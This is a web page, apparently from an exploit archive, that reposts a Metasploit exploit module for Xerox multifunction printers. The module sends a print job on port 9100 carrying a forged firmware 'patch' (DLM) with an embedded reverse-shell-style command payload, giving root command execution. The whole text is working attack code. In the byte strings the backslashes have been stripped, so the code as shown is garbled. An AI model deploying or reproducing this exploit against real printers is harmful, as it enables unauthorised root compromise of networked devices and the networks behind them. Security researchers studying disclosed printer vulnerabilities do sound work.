Home / os / blackberry
Xerox Multifunction Printers (MFP) "Patch" DLM Escalation
Posted on 01 November 2014
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Xerox Multifunction Printers (MFP) "Patch" DLM Vulnerability', 'Description' => %{ This module exploits a vulnerability found in Xerox Multifunction Printers (MFP). By supplying a modified Dynamic Loadable Module (DLM), it is possible to execute arbitrary commands under root priviages. }, 'Author' => [ 'Deral "Percentx" Heiland', 'Pete "Bokojan" Arzamendi' ], 'References' => [ ['BID', '52483'], ['URL', 'http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf'], ['URL', 'http://foofus.net/goons/percx/Xerox_hack.pdf'] ], 'Privileged' => true, 'License' => MSF_LICENSE, 'Payload' => { 'DisableNops' => true, 'Space' => 512, 'Compat' => { 'PayloadType' => 'cmd cmd_bash', 'RequiredCmd' => 'generic bash-tcp' } }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [['Automatic', {}]], 'DisclosureDate' => 'Mar 07 2012', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(9100) ], self.class) end def exploit print_status("#{rhost}:#{rport} - Sending print job...") firmcode = '%%XRXbegin' + "x0A" firmcode << '%%OID_ATT_JOB_TYPE OID_VAL_JOB_TYPE_DYNAMIC_LOADABLE_MODULE' + "x0A" firmcode << '%%OID_ATT_JOB_SCHEDULING OID_VAL_JOB_SCHEDULING_AFTER_COMPLETE' + "x0A" firmcode << '%%OID_ATT_JOB_COMMENT "PraedaPWN2014:' + "#{payload.encoded}" + ':"' + "x0A" firmcode << '%%OID_ATT_JOB_COMMENT "patch"' + "x0A" firmcode << '%%OID_ATT_DLM_NAME "xerox"' + "x0A" firmcode << '%%OID_ATT_DLM_VERSION "NO_DLM_VERSION_CHECK"' + "x0A" firmcode << '%%OID_ATT_DLM_SIGNATURE "ca361047da56db9dd81fee6a23ff875facc3df0e1153d325c2d217c0e75f861b"' + "x0A" firmcode << '%%OID_ATT_DLM_EXTRACTION_CRITERIA "extract /tmp/xerox.dnld"' + "x0A" firmcode << '%%XRXend' + "x0Ax1Fx8Bx08x00xB1x8Bx49x54x00x03xED" firmcode << "xD3x41x4BxC3x30x14x07xF0x9ExFBx29xFExE2x60x20x74" firmcode << "x69x63x37x61x5AxBCx79x94xDDx3CxC8xA0x59x9BxDAx4A" firmcode << "xD7xCCxB4xD3x1DxF6xE1x8DxDDx64xB8x83x3Bx0Dx11xFE" firmcode << "xBFx43x03xAFx2FxEFxBDxB4x64xA3xADxD9x8CxDAxD2x3B" firmcode << "xA3xD0xB9x19x8FxFBxD5x39x5ExC3x58x4ExBCx48xC6x52" firmcode << "x5Ex87xE3x89x8CxBDx30x8AxE4x44x7Ax08xCFx39xD4xB7" firmcode << "x75xDBx29x0Bx78xD6x98xEExB7xBCx53xEFxFFxA9xCBx0B" firmcode << "xB1xA8x1AxB1x50x6DxE9x17x55x9DxA4x2Fx56xAFx10xD4" firmcode << "x08x1Ex30x9Cx59xA5x73x35x7Bx7Ax94x61x14x0Fx21xDE" firmcode << "x95x15xEDxCAx98x5Ax34x99x68x74x27x5ExCDx62x7Ax35" firmcode << "x8Ax52xBFx2AxF0x8CxA0xC0xC0xD5xC0xDCxEFx4AxDDxF8" firmcode << "xC0x47x59xD5x1Ax56xABx1Cx75xD5x68x17xC9x8Dx7Bx00" firmcode << "x3Ax2Bx0Dx06x5Fx31x6CxB1xEBxF8x06xFCx68xD7xE7xF5" firmcode << "x65x07xF7x48x12x84x98xDFx62x5Fx17xC8xCCx72xA9x9A" firmcode << "x3Cx49x0Fx95xB6xD9xBAx43x90x4FxDDx18x32xEDx93x8A" firmcode << "xAAxEFxE8x9AxDCxF5x83xF9xBBxE4xFDxDExEDxE1xE0x76" firmcode << "x89x91xD8xECx6Fx82xFBx0CxFEx5FxFFx15x22x22x22x22" firmcode << "x22x22x22x22x22x22x22x22x22x22x22x22x22xA2xD3x3E" firmcode << "x01x5Ax18x54xBBx00x28x00x00" begin connect sock.put(firmcode) handler rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::AddressInUse => e print_error("#{rhost}:#{rport} - #{e.message}") ensure disconnect end end end
